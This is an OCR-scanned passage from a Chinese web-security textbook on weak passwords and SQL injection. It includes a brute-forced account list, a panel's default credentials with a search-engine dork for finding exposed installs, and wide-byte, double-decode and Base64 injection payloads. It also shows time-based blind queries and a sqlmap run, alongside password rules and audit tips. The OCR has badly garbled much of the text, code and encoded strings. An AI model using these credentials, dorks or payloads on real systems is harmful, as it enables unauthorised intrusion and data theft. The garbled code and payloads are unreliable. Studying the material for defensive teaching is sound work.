的 同时 ， 白 帽子 顺便 做 了 一 次 安全 测试 。 

白 帽 子 通过 一 些 信息 收集 的 方法 找到 对 方 后 台地 址 , 发 现 后 台 登 录 并 不 需要 验证 码 , 于 
是 使 用 burp suite 工具 加 上 一 些 常见 的 后 全 管理 账号 进行 暴力 破解 测试 ， 测 试 后 发 现 了 大 量 
默认 密码 和 账号 ， 如 图 1-34 所 示 为 当时 暴力 测试 的 截图 。 



































图 1-34 暴力 测试 的 截图 





下 面 为 测试 可 用 账号 、 密 码 的 结果 。 


wangjing 123456 
wangli 123456 
liming 123456 
wangpeng 123456 
liuli 123456 
liying 123456 
libo 123456 
chenli 123456 
wangli 123456 
wanghong 123456 
wangjing 123456 
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yangfang 123456 
zhanghongmei 123456 
liying 123456 
liuli 123456 
liguifang 123456 
zhangnan 123456 
libo 123456 
wangli 123456 


从 得 到 的 账号 来 分 析 , 可 以 看 到 都 是 一 些 常见 的 中 文 名 称 拼音 , 密码 都 使 用 了 最 简单 的 
6 位 数 密码 ， 因 此 这 个 安全 问题 最 大 的 原因 就 是 默认 密码 使 用 了 弱 口 令 。 


3. 服务 弱 口令 


上 面 两 个 案例 中 的 弱 口 令 都 是 网 站 后 台 的 , 其 实 弱 口令 在 前 台 也 会 发 生 , 而 且 安全 性 不 
容 小 遍 。 在 2011 年 之 前 ， 某 通信 公司 网 上 营业 厅 可 以 使 用 默认 账号 和 密码 登录 ， 并 且 可 以 办 
理 业 务 ， 而 默认 密码 是 123456 。 

现在 大 部 分 开发 者 搭建 PHP 开 发 环境 都 喜欢 使 用 一 键 安 装 包 , 这 种 安装 包 相 比 一 个 个 服 
务 搭 建 确实 方便 很 多 ， 不 过 同时 也 会 带 来 一 些 安全 隐患 。 以 LANMP 来 说 ， 安 装 LANMP 一 键 
安装 包 之 后 , 会 存在 一 个 默认 的 管理 员 账 号 和 密码 ， 如 果 用 户 在 安装 之 后 没有 及 时 更 改 端口 
与 密码 ， 就 会 导致 被 入 侵 。 

并 且 其 平台 自动 生成 默认 首页 ， 根 据 关键 词 “ 恭 喜 ，lanmp_wdcp 安 装 成 功 ”( 如 图 1-35 
所 示 ) 即 可 在 百度 找到 30 000 多 条 相关 数据 ， 如 图 1-36 所 示 。 


恭喜 ，1lanmp wdcp 安装 成 功 ， 


lanmp ， wdcp 是 一 个 集成 nginx， apache, php, mysql 等 web 应 用 环境 
及 wdcp 管 理 系统 的 RPM 安装 包 , 比 起 编译 包 安装 快速 , 简单 , 5 分 钟 就 可 搞 店 
然后 就 可 以 通过 wdcp 后 台 管理 服务 器 和 网 站 , FTP, 数据 库 等 
使 用 方便 , 操作 简单 , 安全 , 稳定 , 易 用 
lamp, lnmp， lnamp 可 上 | 由 切换 
这 一 切 , 都 是 免费 的 . 


ANGIMX dss ~“@ 


wdcp 系 统管 理 面板 登录 http 














080| 默 认 用 户 密码 :admin wdlinux. en 








查看 本 地 环 
wad0S 官 网 : http 












图 1-35 lanmp_wdcp 安装 成 功 提示 
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08， = 
Bai 合 百度 ”共计 ,anmp_wdcp 安装 成 功 四。 应 一 下 


恭喜 ,lanmp_wdcp 安装 成 功 


wdOS,wdcp,wddns,wdednlampinmp,lnamp,LANMP- 链 安 获 包 ... 上 言 ,lanmp_wdcp 安装 成 
Janmp_wdcp 是 “个 集成 nginxapache phpumysql 竺 web 应 用 环境 及 wdcp 管 理 系统 的 -. 
wwwiiftel.com/ ~ - 百度 快 隐 - 评 人 


共 喜 .lanmp_wdcp 安装 成 功 
wdOS ,wdcp,wddns,wdcdnlamp inmpJnamp,LANMP “ 键 文革 包 ， 亲 吉 Ianmp_wde 
Janmp_wdcp 站 “个 集成 nginx,apache php,mysql 等 web 访 川 环境 及 wdcp 管 
edson888 com/ ~ -主人 





基 喜 ,lanmp_wdcep 安装 成 功 


wdOS,wdep,wddns,wdednlamp inmpinamp LANMP 一 链 安 获 亿 此 襄 ,lanmp_wdep 安装 成 
功 lanmp_wdep 古 一 个 华 成 nginx,apache,php,mysql 等 web 应 用 环境 及 wdcp 管 理 系统 的 
Www skyads com cn/  - 百度 快 隐 - 


基 喜 .lanmp_wdcep 安装 成 功 





wdOS,wdcp,wddns,wdcdn,lamp,inmp,lnamp,LANMP 一 饼 安 获 但 .. 苏 离 ,lanmp_wdcp 交 间 大 
功 lanmp_wdcp 是 一 个 华 成 nginx,apache,php,mysq| 等 web 忆 用 环境 及 wdcp 管 于 系统 的 ， 
Www vzpedia com/ ~ - 百度 由 


些 吉 ,lanmp_wdep 安装 成 功 

wdOS,wdcp,wddns,wdedn,lamp,Inmp,inamp,LANMP “各 安 闭 包 … 花 襄 ,lanmp_wdep 安装 
JMlanmp_wdcp 站 一个 集成 nginx,apache ,php,mysql 等 web 访 用 环 庆 及 wdcp 管 理 系统 的 
www.cqmryk.com/ ~ - 百 应 快照 














图 1-36 百度 上 找到 的 相关 数据 


其 中 一 半 以 上 可 直接 用 默认 的 账号 和 密码 (admin wdlinux.cn) 登录 ， 后 台 权 限 非 常 高 ， 
攻击 者 可 直接 入 侵 服务 器 。 





1.3.4 


和 


S$ 


ba 


防范 方法 
防止 弱 口 令 设计 规则 


不 使 用 空 口令 或 系统 默认 的 口令 ， 因 为 这 些 口 令 众所周知 ， 为 典型 的 弱 口 令 。 
口令 长 度 不 小 于 8 个 字符 。 

口令 不 应 该 为 连续 的 某 个 字符 (例如 123456 ) 或 重复 某 些 字符 的 组 合 (例如 
zxcvb.asdf. ) 。 

口令 应 该 为 这 4 类 字符 的 组 合 : 大 写字 母 (A~Z ) 、 小 写字 母 (a~z) 、 数 字 ( 0~9) 
和 特殊 字符 。 每 类 字符 至 少 包 含 一 个 。 如 果菜 类 字符 只 包含 一 个 ， 那 么 该 字符 不 应 
为 首 字 符 或 尾 字 符 。 

口令 中 不 应 包含 本 人 、 父 母 、 子 女 和 配偶 的 姓名 和 出 生日 期 、 纪 念 日 期 、 登 录 名 、 
E-Mail 地 址 等 与 本 人 有 关 的 信息 ， 以 及 字典 中 的 单词 。 

口令 不 应 该 用 数字 或 符号 代替 某 些 字母 的 单词 。 

口令 应 该 易 记 且 可 以 快速 输入 ， 防 止 他 人 从 你 身后 很 容易 地 看 到 你 的 输入 。 

最 多 180 天 内 更 换 一 次 口令 ， 防 止 未 被 发 现 的 入 侵 者 继续 使 用 该 口令 。 
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2. 个 人 保护 口令 的 方法 


他 


2 多 


不 要 向 他 人 透露 口令 ， 包 括 管 理 员 和 维护 人 员 ， 如 果 有 索要 口令 的 人 ， 就 应 该 保持 
警惕 。 

在 E-Mail 或 即时 通信 工具 中 不 透露 口令 。 

离开 计算 机 前 ， 启 动 有 口令 保护 的 屏幕 保护 程序 。 

在 多 个 账户 之 间 使 用 不 同 的 口令 。 

在 公共 计算 机 中 不 要 选择 程序 中 可 保存 口令 的 功能 选项 。 

切记 不 要 使 用 弱 口 令 ， 并 保护 好 你 的 口令 。 

同时 要 注意 ， 改 过 的 口令 一 定 要 牢记 。 很 多 人 常 因 改 口令 而 遗忘 ， 造 成 很 多 不 必要 
的 麻烦 。 


常规 漏洞 是 指 大 部 分 网 站 都 有 可 能 出 现 的 漏洞 , 这 些 漏 洞 有 很 多 共同 的 特点 , 通常 都 是 
在 参数 输入 或 结果 输出 时 验证 不 严谨 所 导致 的 ， 比 如 SQL 注 入 是 因为 恶意 的 参数 未 经 过 滤 或 
限制 导致 被 拼接 到 了 SQL 语句 中 ， 再 比如 XSS 跨 站 脚本 攻击 可 能 是 参数 输出 未 经 正确 转 义 所 
导致 的 。 


在 Web 安 全 中 ， 常 规 漏 洞 有 SQL 注入 、XSS 跨 站 、 代 码 注入 、CSRF 跨 站 请 求 伪造 、 文 件 
包含 、 文 件 上 传 等 ， 本 章 将 详细 介绍 这 几 种 漏洞 的 成 因 及 对 应 的 防御 方案 。 


2.1 SQL 注入 


1. 使 用 用 户 的 参数 拼接 SQL 语句 


2. 参数 改变 了 原 SQL 语 句 的 结构 
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SQL 注入 就 是 攻击 者 通过 把 SQL 命令 插入 Web 表 单 后 提交 服务 器 ， 最 终 达 到 让 后 台数 据 
库 执 行 恶 意 的 SQL 命令 的 目的 ， 并 根据 程序 返回 的 结果 获得 某 些 攻击 者 想 得 知 的 数据 。 

具体 来 说 ， 攻 击 者 利用 服务 器 中 的 Web 应 用 程序 将 带 有 恶意 的 SQL 语句 作为 Web 表 单 中 
4 参数 提交 到 服务 器 ， 服 务 器 所 接收 的 程序 又 把 带 有 恶意 的 SQL 语句 作为 SQL 语句 中 的 一 个 
参数 执行 了 ， 而 执行 的 效果 并 不 是 程序 员 想 要 执行 的 SQL 语句 结构 。 

比如 先前 CSDN 泄 露 600 多 万 会 员 密码 ， 大 家 猜测 这 些 数据 就 是 通过 SQL 注入 泄露 出 
来 的 。 
2.1.1 注入 方式 

1. 常规 注入 


通常 没有 任何 过 滤 ， 直 接 把 参数 存放 到 了 SQL 语句 中 ， 如 图 2-1 所 示 。 

















图 2-1 把 参数 放 到 SQL 语句 中 


可 以 看 出 ， 变 量 $uid 通 过 $_GET['id] 接 收 ， 参 数 未 进行 过 滤 ， 便 将 其 放 到 了 SQL 语句 中 ， 
语句 也 未 使 用 预 处 理 ， 而 $_GET 变 量 攻击 者 是 可 以 控制 的 ， 因 此 便 会 造成 SQL 注 入 。 


2. 宽 字 节 注入 





在 实际 环境 中 ， 程 序 员 很 少 写 一 点 防护 都 没有 的 代码 ， 宽 字 节 注入 源 于 程序 员 设 置 
MySQL 连 接 时 错误 配置 为 set character_set_client=gbk， 这 样 配置 会 引发 编码 转换 从 而 导致 注 
入 漏洞 。 

(1) 正常 情况 下 ， 当 GPC 开 启 或 使 用 addslashes 函 数 过 滤 GET 或 POST 提 交 的 参数 时 ， 
攻击 者 使 用 的 单 引号 “'” 就 会 被 转 义 为 “\”。 

(2) 但 如 果 存 在 宽 字 节 注入 , 我 们 输入 %df%27 时 , 首先 经 过 单 引 号 转 义 成 %df%5c%27 

(%5c 是 反 和 斜 杠 \) ,之 后 在 数据 库 查询 前 使 用 了 GBK 多 字 节 编码 ， 即 在 汉字 编码 范围 内 两 个 
字 节 会 被 编码 为 一 个 汉字 。 
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(3) 然后 MySQL 服 务 器 会 对 查询 语句 进行 GBK 编 码 ， 即 %df%5c 转 换 成 汉字 “ 运 ”， 
而 单 引号 逃逸 了 出 来 ， 从 而 造成 注入 漏洞 。 
下 面 将 介绍 出 现在 PHP 中 因为 字符 编码 转换 导致 的 注入 问题 。 


假设 图 2-1 所 示 为 正常 访问 代码 ， 其 链接 为 : http:/www.localhost.test/test.php?id=1， 攻 
击 者 在 链接 中 增加 了 一 些 字符 ，URL 为 : http://www.localhost.test/test.php?id=1%df 'or 1='1， 
当 后 端 PHP 代 码 如 图 2-2 所 示 时 ， 便 会 导致 参数 宽 字 节 注入 。 





宽 字 节 注入 代码 
mysql_query ("3ET NAMES "dbk'n) 7 
// Get input 











$id = isset($ REQUEST['1d']) ? addslashes($ REQUEST[I'id']) : 0; 
// Check database 
$query = "SELECT first name, last name FROM users WHERE user id = '$id';"; 





%df ==%df%5c%27== 到 (=) \ 一 %5c% %df%5c%27== 运 ' 
SELECT first_name, last_name FROM users WHERE user_id='4 








SELECT first_name, last_name FROM users WHERE user_id = '4 逐 ' union select .… 








图 2-2 访问 的 代码 
SET NAMES 'gbk' 可 以 理解 为 等 于 : 


set character set_client=gbk; 
set character_set_connection=gbk; 
set character_set_results=gbk; 


(1) 代码 中 ， 参 数 id 接收 后 会 通过 addslashes 方 法 转 义 ， 会 把 %df' 转 义 为 "dfv 。 
(2) %df\=%dfy%5c%27 在 使 用 GBK 编 码 的 时 候 ， 会 认为 %df%5c 是 一 个 宽 字 节 
%df%5c%27= 纺 '"， 这 样 就 会 产生 注入 。 
为 了 防止 宽 字 节 编码 出 现 的 参数 问题 ， 现 在 开发 者 基本 上 都 会 选择 将 MySQL 连 接 配 置 
为 setcharacter_set_client=binary 来 解决 。 
3. 宽 字 节 注入 案例 
2015 年 6 月 ， 白 帽子 “小 川 ” 提 交 了 一 个 购物 网 站 宽 字 节 注入 漏洞 。 
缺陷 编号 : wooyun-2015-0121068。 
如 图 2-3 所 示 , 请 求 的 URL 为 : http://cx.localhost.com/project/lottery/hosts/get_ticket.php? 
apply_id=12913&lottery_id=1025%df or sleep(10)%23。 
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Load URL 
Split URL 
Execute 


sleep (10) 23 请求 出 现 延迟 。 这 里 


的 saf 是 利用 mysql1 gbk 编 码 时 php 
使 用 adaslashes 进 行 注入 过 渡 氧 陷 
宽 字 节 吃 掉 了 \ ' 的 原理 





get ticket. php?apply id=12913&lottery 


Vv:38.0) Gecko/20100101 Fi 
ion/xml ;q=0. 9, */*;q=0. 8 
-0.3 


id=1025%df%27*%23 HTTP/1. 1 


我 们 可 以 保留 saf，s#23， 然 后 再 
到 sqlmap 里 去 跑 , 这 样 就 可 以 让 
sqlmap 识 别 进行 暴 库 了 


;53948102618; MDD ddclic =20150616195815042681 





图 2-3 在 参数 lottery id 中 加 入 了 %df 值 
从 请 求 的 URL 中 可 以 看 出 , 白 帽子 在 参数 lottery_id 中 加 入 了 %df 值 来 绕 过 
过 滤 ， 在 后 面 的 sleep(10) 中 则 通过 盲 注 来 判断 注入 是 否 成 功 。 


当 手 工 测试 成 功 后 ， 把 该 地 址 交 给 SQLMap， 使 用 工具 来 测试 是 否 可 以 拖 库 ， 如 图 2-4 
所 示 。 


后 端的 参数 


cron_log 
demand_info 
demand_summary 
lottery 
lottery_condition 
lottery_cust_total 
r_1o9 


lottery_er 
lottery_hi 
lottery_reduce_points_ 
lottery_rule 
lottery_ticket 
winning_dd_coupon: 
nning_shop_coup' 


queue 





图 2-4 使 用 工具 来 测试 是 否 可 以 拖 库 
. 二 次 编码 注入 
二 次 编码 注入 ， 即 二 次 urldecode 注 入 ， 是 因为 使 用 urldecode 不 当 所 引起 的 漏洞 。 
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在 PHP 中 , 常用 过 滤 函 数 如 addslashes(、mysql real escape string()、mysql_escape_string() 
或 者 魔术 引号 GPC 开 关 来 防止 注入 ， 原 理 都 是 在 单 引 号 (') 、 双 引号 (") 、 反 斜 杠 (\) 和 
NULL 等 特殊 字符 前 面 加 上 反 斜 杠 来 进行 转 义 。 

但 是 这 些 函 数 在 遇 到 urldecode() 函 数 时 ， 都 会 因为 二 次 解码 引发 注入 。urldecode0) 函 数 
是 对 已 编码 的 URL 进 行 解码 。 引 发 二 次 编码 注入 的 原因 其 实 很 简单 ，PHP 本 身 在 处 理 提交 的 
数据 之 前 会 进行 一 次 解码 。 

例如 /test.php?id=1 URL, 我 们 构造 字符 串 /test.php?id=1%2527, PHP 第 一 次 解码 时 ，%25 
解码 成 了 %, 于 是 URL 变 成 了 /test.php?id=%27; 然后 urldecode() 函 数 又 进行 了 一 次 解码 , %27 
解码 成 了 '， 于 是 最 终 URL 变 成 了 /test.php?id=1'， 单 引号 引发 了 注入 。 

而 rawurldecode() 函 数 也 会 产生 同样 的 问题 ， 因 此 这 两 个 函数 需要 慎 用 。 

因为 mysql_real_escape_string() 在 urldecode() 之 前 ， 所 以 过 滤 对 urldecode() 产 生 的 单 引 号 
并 没有 效果 。 请 看 下 述 代 码 : 

<2php 








function test() 
$conn = mysql_connect('localhost', 'root, '123"); 
mysql_select_db("test", $conn); 
// 参 数 转 义 
$id = mysql_real escape string($ GET['id"]); 
//URL 编码 
$id = urldecode($id); 
$sql = "select * from test where id="'$id"™"; 
$query = mysql_query($sql, $conn); 
if ($query == True) { 
$result = mysql_fetch_array($query); 
$user = $result["user"]; 
$email = $result["email"]; 
print_r( 用 户 名 : '. $user . '<br />"); 
print_r(' 邮 箱 : '. $email.'<br />"); 
print_r('<br />SQL 语句 : '. $sq]); 
} 


mysql_close($conn); 
} 


变量 $id 虽 然 经 过 mysql_real_escape_string 转 义 来 防止 SQL 注 入 ， 但 是 转 义 之 后 进行 
urldecode 编 码 便 会 造成 二 次 注入 问题 ， 此 时 如 果 攻 击 者 用 常规 的 注入 方式 注入 ， 是 无 法 注入 
成 功 的 ， 因 为 会 被 转 义 掉 ， 如 图 2-5 所 示 。 
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DD testlocalhost/erfen.php” x 


A GC 合 |@ testlocalhost/erfe 


用 户 名 : ?? 
邮 箱 : abc@ab.com 


SQL 语句 : select * from test where id="1\ and 1=1# 





图 2-5 注入 会 被 转 义 








i 者 特意 构造 出 二 次 编码 注入 漏洞 的 URL 时 ， 依 然 会 引发 注入 漏洞 问题 ， 如 





但 是 当 攻 
图 2-6 所 示 。 





[bs tlocalhost/erfen.php” X 


€ GC 合 | © testlocalhost 


用 户 名 : ?? 
邮箱 : abc@ab.com 


SQL 语句 : select * from test where id="1' and 1=1# 





图 2-6 构造 URL 编码 引发 注入 





图 2-5 中 的 SQL 语句 结构 已 经 完全 被 攻击 者 所 控制 ， 此 时 执行 此 SQL 语句 将 会 查询 出 test 
表 中 所 有 的 数据 。 
可 以 使 用 SQLMap 工 具 来 利用 这 个 


sqlmap.py -u "http://test.localhost/erfen.php?id=1%2527" --random-agent -v 3 --batch 





:入 ， 把 payload 构 造 好 ， 命 令 如 下 〈 见 图 2-7) : 


[时 starting at 22:20 
:39] [DEBUG] cleaning up configuration paraneters 
setting the HITP timeout 
loading random HTTP User-Agent header (s) fron file "E:\wrv\sqlmap\tit\user-agents. txt 
:39] [INF0] fotched random HTTP User-Agent header from file 'R:\vw\sqlnap\txt\usor-agonts. txt' : 
Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.0.11) Gecko/20070312 Firefoz/1.5.0.11 
9] [DEBUG] creating HTTP requests opener object 
:39] [INF0] resuning back-end DEMS ‘nysal’ 
solving hostname ' test. localhost 


9] [INF0] testing connection to the target URL 


sqlmap resumed the following injection point(s) from stored session: 


---Parameter: id (GET 
Type: AND/OR tine-based blind 
MySQL >= 5.0. 12 AND time-based blind 
id=1%27 AND SLEEP， XBeu 
AND [RANDNUM] =IF(([INFERENCE]), SLEgP ([SLEEPT IME]), [RANDNUM]) 


9] [INF0] the back-end DBMS is MySQL 
Web application technology: Apache 2. 4.23，PHP 5.6.25 


back-end DBMS: MySQL >= 5.0. 
[22:20:39] [INF0] fetched data logged to text files under "C:\Users\Adninistrator\, sqlnap\output\test. localhost’ 














图 2-7 使 用 SQLMap 工具 构造 注入 








36 


第 2 章 常规 漏洞 


开发 者 在 黑 盒 测试 SQL 注入 的 时 候 ， 其 实 可 以 在 URL 后 面 加 上 %2527， 很 有 可 能 “ 瞎 猫 
遇 上 死 耗 子 ”， 碰 到 二 次 解码 引发 注入 的 情况 。 

现在 知道 了 二 次 编码 漏洞 是 因为 urldecode 函 数 引起 的 ， 所 以 可 以 通过 编辑 器 搜索 
urldecode 和 rawurldecode 找 到 二 次 URL 漏 洞 。 


(1) 宽 字 节 注 入 ， 在 网 站 使 用 GBK 编 码 的 情况 下 ， 搜 索 关键 词 character_set_client=gbk 
和 mysql_set_chatset('gbk') 就 行 。 

(2) 二 次 urldecode 注 入 , 少数 情况 下 ，gpc 可 以 通过 编辑 器 搜索 urldecode 和 rawurldecode 
找到 二 次 URL 漏 洞 。 


4. Base64 编码 注入 


前 面 提 到 URL 编 码 注 入 ， 如 urldecode、rawurldecode 两 个 函数 。 除 了 URL 编 码 外 ， 常 见 
的 还 有 Base64 编 码 注 入 。 

漏洞 成 因 

大 家 应 该 对 Base64 函 数 不 会 陌生 ， 在 很 多 场合 都 会 用 来 编码 解码 ， 一 些 系 统 经 过 前 端 
Base64 编 码 后 传 入 服务 器 ， 而 服务 器 接收 参数 做 检测 时 并 没有 先 解码 ， 因 此 认为 参数 是 可 信 
的 而 被 攻击 者 绕 过 。 

例如 攻击 者 传 入 “1' or '1'="1” 的 时 候 ， 防 御 模 块 原本 会 识别 出 来 ， 可 是 参数 经 过 前 端 
的 Base64 转 换 后 ， 此 参数 已 变 成 “MScgb3IgJzEnPScx”， 此 时 防御 模块 已 经 不 能 根据 关键 词 
分 析出 此 参数 的 恶意 字符 了 。 

作为 可 逆 的 编码 ， 在 审计 过 程 中 ， 如 果 遇 到 Base64_deocde 函 数 ， 并 没有 在 之 后 做 任何 
过 滤 ， 直 接 拼接 到 SQL 语句 中 ， 就 极 有 可 能 会 导致 一 个 SQL 注入 漏洞 。 当 然 ， 如 果 攻 击 者 要 
利用 , 肯定 和 普通 SQL 注入 方法 不 一 样 。 攻 击 者 首先 要 把 注入 的 语句 构造 好 , 然后 经 过 Base64 
编码 后 传 入 服务 器 。 因 为 特殊 字符 也 被 Base64 编 码 了 ， 所 以 addsalshes() 等 函数 对 Base64 编 码 
后 的 参数 是 无 法 起 作用 的 。 


Base64 编码 漏洞 案例 


2016 年 1 月 , 白 帽 子 “ 路 人 甲 ” 提 交 漏 洞 “ 某 App 存在 SQL 注入 (SQLMap 之 全 POST 
Base64 编码 实例 ) ”。 
缺陷 编号 : wooyun-2016-0177954。 


白 帽子 在 使 用 其 App 时 发 现 一 处 POST 请 求 ， 请 求 中 的 参数 值 是 编码 后 的 字符 串 ， 命 
令 如 下 : 
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了 POST http://push.localhost.com/index.php?r=api/client/startdevicecall HTTP/1.1 

Host: push.feng.com 

Content-Type: application/x-www-form-urlencoded 

Connection: keep-alive 

Proxy-Connection: keep-alive 

Accept: */* 

User-Agent: WPForumPortal/2.1.2 (iPhone; iOS 1; Scale/2.00) 

Accept-Language: zh-Hans-CN;q=1 

Content-Length: 1555 

Accept-Encoding: gzip, deflate 

data=eyJhcHBfa2V5IjioiYWRIOTY2ZDUxZjUyNTIIZGFkMTMONiMON2M1IMTI3NDAiLCJ2ZXJpZ 
nkiOiI5NDIjM( 内 容 过 长 ， 省 略 .…) 


当 白 帽子 将 参数 值 Base64 解码 后 ， 可 以 看 到 里 面 的 参数 是 一 个 关联 数组 结构 ， 白 帽子 
接 下 来 对 其 进行 了 一 番 SQL 注入 测试 : 

data={"app_key":"ade966d5 1f5259edad1346347c512740","verify":"949c18e15ad6d040db80577ce515 
476f"',"encrypt_data":"wntQVxBw6bvaEvM1nW( 内 容 过 长 ， 省 略 ..….)"} 


白 帽子 首先 构造 了 一 个 盲 注 ， 当 条 件 满足 时 ， 返 回 结 果 延 时 3 秒 钟 ， 构 造 的 代码 如 下 : 


{"app_key":"(select(0)from(select(sleep(0)))v)V*"+(select(0)from(select(sleep(3)))v)+"\"+(select(0)from 
(select(sleep(0))v)+\"*V","encrypt_data":"wntQVxBw6bvaEvM1lnW2yJB3x( 内 容 过 长 ， 省 略 ..….)"} 


由 于 原始 请 求 Base64 编码 后 的 结果 为 了 保持 数据 结构 不 变 ， 因 此 白 帽 子 再 次 对 参数 进 
行 编码 ， 得 到 下 面 的 请 求 包 : 

POST /index.php?r=api/client/startdevicecall HTTP/1.1 

Content-Length: 1673 

Content-Type: application/x-www-form-urlencoded 

X-Requested-With: XMLHttpRequest 

Referer: http://push.localhost.com/index.php?r=api/client/startdevicecall 

Host: push.feng.com 

Connection: Keep-alive 

Accept-Encoding: gzip,deflate 

User-Agent: Mozilla/2.2.0 (Windows NT 2.3.1; WOW64) AppleWebKit/532.4.21 (KHTML, like 
Gecko) Chrome/41.0.2222.5.0 Safari/532.4.21 

Accept: */* 

data=eyJhcHBfa2V5SIjoiKHNIbGVjdCgwKWZyb20oc2VSZWNOKHNSZWVwKDAPKSI2KVwvKicr 
KHNIbGVjdCgwKWZyb20oc2VSZWNOKHNSZWVwKDAPKSI2KSsnXCIrKHNIbGVjdCgwKWZyb20oc2 
VsZWN0OKHNsZWVwKDApKSI2KStclipcLyI( 内 容 过 长 ， 省 略 .…) 


如 图 2-8 所 示 ， 通 过 白 帽 子 的 一 番 测 试 之 后 ， 得 到 了 数据 库 名 称 。 
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图 2-8 得 到 数据 库 名 称 
2.1.2 ”漏洞 的 3 种 类 型 
1. 可 显 注入 


攻击 者 可 以 直接 在 当前 界面 中 获取 想 要 的 内 容 ， 如 图 2-9 所 示 。 






Vulnerability: SQL Injection 





Submt 














图 2-9 通过 简单 参数 查 到 表 数据 


在 图 2-9 中 可 以 看 到 , 通过 一 个 简单 的 恶意 参数 把 整 张 user 表 的 数据 全 部 查询 了 出 来 , 并 
且 返 回 到 了 页 面 中 。 


2. 报错 注入 
数据 库 查 询 返回 结果 并 没有 在 页 面 中 显示 , 但 是 应 用 程序 将 数据 库 报 错 信息 打印 到 了 页 
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面 中 , 所 以 攻击 者 可 以 借 此 构造 数据 库 报错 语句 从 报错 信息 中 获取 想 要 的 内 容 , 笔者 建议 在 


数据 库 类 中 设置 不 抛 出 错误 信息 ， 如 图 2-10 所 示 。 





€ FC Drarketing171173.con/Ari/Shmbatadiesa 





CDbException 


CDbCommand 无 法 执行 SQL 语句: SQLSTATE[22003]: 
1690 DOUBLE value is out of range in ‘exp(~((select|'act_admin@ 10.59.107.125" 


from dual)))'. The SQL statement executed was: select 
Code,sprice,oprice,demolink,info from tbl_ad_info where “code ="aa"+EXP(~(select 


* from (select user())a))+"bb" 


/home/httpd/html/marketing.17173.com/framework/db/CDbCommand.php(528) 
return $result; 


catch(Exception $e) 


1f($this-»_connection->enableProfiling) 
Y11: :endProfile( systen. db.CDbComand. query( .Sthis-- Peet Spar 

$errorInfo = $e instanceof PDOExceprion ? ge-yerrarInfo : null 

Smessage = Se->BetMessage() 

Yii::108(Yii::t( "yii’, “CDbConnand:: {mothod}() failed: {arror}. The SQL 

{nethod}'=>$mathod, {orror}’=»Snessage, “{sql}"= 4 S81 

» 





图 2-10 数据库 把 敏感 数据 (用 户 名 、IP 地 址 ) 返回 到 前 台 


可 以 看 到 ， 当 数据 库 执行 了 异常 的 SQL 语句 时 ， 把 错误 抛 给 了 PHP， 而 PHP 没 有 做 屏蔽 
处 理 ， 又 把 数据 库 中 的 一 些 敏 感 数据 (用 户 名 、IP 地 址 ) 返回 到 了 前 台 ， 设 置 返回 了 部 分 代 
码 和 文件 存放 路 径 。 

3. 盲 注 注 入 

盲 注 是 指数 据 库 查 询 结果 无 法 从 直观 页 面 中 获取 , 攻击 者 通过 使 用 数据 库 逻 辑 或 使 数据 
库 执行 延 时 等 方法 获取 想 要 的 内 容 。 如 图 2-11 所 示 ， 盲 注 分 为 布尔 盲 注 和 时 间 盲 注 。 





布 
通过 条 件 是 否 


// 正 常 URL 


http://127.0.0.1/sqli-labs/Less-1/?id=1 
and (select substr(email_id,1,1) from emails where id=3) > 'a // 布 尔 
// 时 间 


“If(ascii(substr(database(),1,1))>115,0,sleep(5))%23 





图 2-11 布尔 盲 注 和 时 间 盲 注 
布尔 讶 注 
布尔 盲 注 利用 MySQL 条 件 不 成 立时 返回 空 内 容 ， 条 件 成 立时 返回 正常 的 数据 的 特点 来 


40 


第 2 章 常规 漏洞 


进行 攻击 。 比 如 MySQL 中 有 一 个 substr 函 数 ， 它 可 以 截取 MySQL 内 部 的 返回 值 与 某 一 字符 进 
行 比较 ， 通 过 遍历 比较 就 可 以 还 原 出 攻击 者 想得到 的 结果 。 


时 间 育 注 


同 理 ， 时 间 盲 注 通 过 substr 截 取 字 段 返回 信息 的 字符 ， 通 过 一 个 个 字符 推算 出 最 终 的 数 
据 。 和 布尔 盲 注 稍微 不 同 的 是 ， 时间 盲 注 不 是 依据 页 面 是 否 返 回 空 内 容 来 判断 是 否 成 立 ， 而 
是 根据 响应 时 间 来 判断 ， 如 果 条 件 成 立 ， 页 面 就 会 比 平时 晚 5 秒 钟 响应 。 











2.1.3 ”检测 方法 
针对 上 面 提 到 的 利用 漏洞 的 方法 , 这 是 


总 结 了 几 种 攻击 者 攻击 的 方法 , 我 们 可 以 用 来 检 





测 注入 漏洞 。 
1. 参数 过 滤 检 查 


(1) 参数 接收 位 置 ， 检 查 是 否 有 没 过 滤 直 接 使 用 $ GET、$_POST、$_COOKIE 参 数 


的 情况 。 

(2) SQL 语 句 检查 ， 搜 索 select、upd 
数 是 否 可 以 被 控制 。 

例如 下 面 的 代码 ， 可 以 看 出 在 接收 位 


ate 、insert 等 SQL 语句 关键 词 ， 检 查 SQL 语 句 的 参 


置 直接 引用 了 $_GET 参 数 ， 并 把 遍历 直接 放 到 了 


SQL 语句 中 ， 所 以 肯定 是 存在 SQL 注入 漏洞 的 。 


<?php 


function index() 
上 
$id= $_GET['bk']; 
$bk = &S$id; 
if (empty($id)) { 
exit ("参数 错误 ! "); 


} 

/开始 分 页 大 小 

$page_size = 5; 

// 获 取 当 前 页 码 

$page_ num = empty($_GET['page]) 2 1 
/计算 记录 总 数 


:$ GET['page']; 


$sql = "select count(*) as c from bbs_post where cid='$bk"™; 


$row = mysql_ func($sql); 
$count = $row[0][c]; 
// 计 算 记录 总 页 数 


$page_count = ceil($count / $page_size); 
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/防止 越界 

if ($page num >= $page_count) { 
$page_num = $page_count; 

} 


2. 在 URL 中 寻找 注入 点 





如 何 寻找 注入 点 呢 ? 以 Permeate 系 统 为 例 ， 打 开 论 坛 中 的 一 个 板块 ， 观 察 一 下 URL: 


http://permeate.localhost/home/index.php?m=tiezi&a=index&bk=5， 如 图 2-12 所 示 。 
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图 2-12 查看 论坛 的 URL 
3. 验证 注入 点 





尝试 在 bk=5 参 数 后 面 加 上 一 个 “'”， 然 后 观察 页 面 是 否 有 明显 的 变化 ，URL: 
http://permeate.localhost/home/index.php?m=tiezi&a=index&bk=5'"， 可 以 看 到 加 上 之 后 页 面 内 


容 已 经 明显 发 生 了 改变 ,其 中 一 个 主题 不 见 了 ， 出 现 这 种 现象 大 多 数 情 况 下 存在 注入 点 
图 2-13 所 示 。 
国情 运 隐 六 系 统 册 江 x 和 + 
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帖子 标 是 作者 回复 /查看 最 后 发 表 
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图 2-13 ”改变 后 的 页 面 
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4. 渗透 测试 


分 


